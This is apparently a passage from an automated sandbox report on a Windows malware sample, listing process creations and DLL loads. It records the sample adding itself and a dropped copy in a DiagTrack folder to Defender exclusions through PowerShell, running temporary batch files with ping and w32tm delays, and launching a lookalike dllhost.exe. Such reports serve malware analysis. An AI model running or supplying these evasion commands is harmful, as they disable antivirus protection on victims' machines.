                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\dllhost.exe "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                            Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\dllhost.exe "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe C:\Users\user\Desktop\PlZA6b48MW.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe C:\Users\user\Desktop\PlZA6b48MW.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: apphelp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dll
